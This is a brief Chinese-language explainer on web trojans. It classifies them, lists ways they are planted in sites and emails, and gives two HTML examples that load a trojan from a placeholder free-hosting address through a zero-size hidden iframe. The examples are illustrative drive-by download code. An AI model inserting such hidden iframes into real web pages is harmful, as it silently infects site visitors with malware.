網頁木馬

類別：

• 主動木馬：有特定攻擊對象(遊戲木馬)
• 被動木馬：沒有特定對象(網頁木馬)

手法：

• 該網站被瀏覽時加掛一個網頁(跳出縮小的小視窗)
• 該網站被瀏覽時加掛一個隱藏框架
• 該網站被瀏覽時加入(傳入)圖片木馬
• 信箱收到HTML格式的網頁木馬
• 利用ASP網站的 include file
• 利用網站的 JavaScript 程式掛入木馬

例如：

<html>
<body>
<iframe src="http://免費空間的木馬網址" width=0 height=0></iframe>
<img src="http://免費空間的圖片網址"></img>
</body>
</html>

或

<html>
<body>
<iframe src="http://免費空間的木馬網址" width=0 height=0></iframe>
</body>
</html>